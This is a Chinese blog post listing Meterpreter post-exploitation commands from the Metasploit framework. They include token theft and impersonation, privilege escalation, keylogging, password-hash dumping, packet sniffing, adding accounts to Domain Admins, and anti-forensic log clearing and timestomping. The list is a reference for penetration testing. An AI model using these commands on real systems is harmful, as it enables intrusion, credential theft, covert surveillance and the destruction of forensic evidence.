metasploit中meterpreter命令

  meterpreter是Metasploit框架中的一个杀手锏,通常作为漏洞溢出后的攻击载荷所使用,攻击载荷在触发漏洞后能够返回给我们一个控制通道。

常见的meterpreter命令

  1.  run scriptname       运行Meterpreter脚本,在scripts/meterpreter目录下可查看所有的脚本名。
  2.   sysinfo                    列出受控主机的系统信息。
  3.   ls                             列出目标主机的文件和文件夹信息。
  4.   use priv                    加载特权提升扩展模块,来扩展Meterpreter库。
  5.   ps                            显示所有运行进程以及关联的用户账号。
  6.   migrate PID               迁移到一个指定的进程ID(PID可通过ps从目标主机上获得)。
  7.   use incognito             加载incognito功能(用来盗窃目标主机的令牌或是假冒用户).
  8.   list_tokens -u            列出目标主机用户的可用令牌。
  9.   list_tokens -g            列出目标主机用户组的可用令牌。
  10.   impersonate_token DOMAIN_NAME\\USERNAME             假冒目标主机上的可用令牌。
  11.   steal_token PID          盗窃给定进程的可用令牌并进行令牌假冒。
  12.   drop_token                停止假冒当前令牌。
  13.   getsystem                  通过各种攻击向量来提升系统用户权限。
  14.   shell                          以所有可用令牌来运行一个交互的shell。
  15.   execute -f cmd.exe -i  执行cmd.exe命令并进行交互。
  16.  execute -f cmd.exe -i -t 以所有可用的令牌来执行cmd命令。
  17.   execute -f cmd.exe -i -H -t  以所有可用的令牌来执行cmd命令并隐藏该进程。
  18.   rev2self                      回到控制目标主机的初始化用户账号下。
  19.   reg command              在目标主机注册表中进行交互,创建,删除,查询等操作。
  20.   setdesktop number      切换到另一个用户界面(该功能基于哪些用户已登录)。
  21.   screenshot                  对目标主机的屏幕进行截图。
  22.   upload file                   向目标主机上传文件
  23.   download file               从目标主机下载文件。
  24.   keyscan_start             针对远程目标主机开启键盘记录功能。
  25.   keyscan_dump            存储目标主机上捕获的键盘记录。
  26.   keyscan_stop              停止针对目标主机的键盘记录功能。
  27.   getprivs                      尽可能多的获取目标主机上的特权。
  28.   uictl enable keyboard/mouse     接管目标主机的键盘和鼠标。
  29.   background                 将你当前的Meterpreter shell转为后台执行。
  30.   hashdump                   导出目标主机中的口令哈希值。
  31.   use sniffer                   加载嗅探模块。
  32.   sniffer_interfaces          列出目标主机所有开放的网络接口。
  33.   sniffer_dump interfaceID pcapname        在目标主机上启动嗅探。
  34.   sniffer_stats interfaceID  获取正在实施嗅探网络接口的统计数据。
  35.   sniffer_start interfaceID packet-buffer  在目标主机上针对特定范围的数据包缓冲区启动嗅探。
  36.   sniffer_stop interfaceID 停止嗅探。
  37.   add_user username password -h ip   在远程目标主机上添加一个用户。
  38.   add_group_user "Domain Admins" username -h ip     将用户添加到目标主机的域管理员组中。
  39.   clearev                        清除目标主机上的日志记录。
  40.   timestomp                   修改文件属性,例如修改文件的创建时间(反取证调查)。
  41.   reboot                         重启目标主机。
posted @ 2016-03-11 14:59  blacksunny  阅读(2317)  评论(0编辑  收藏  举报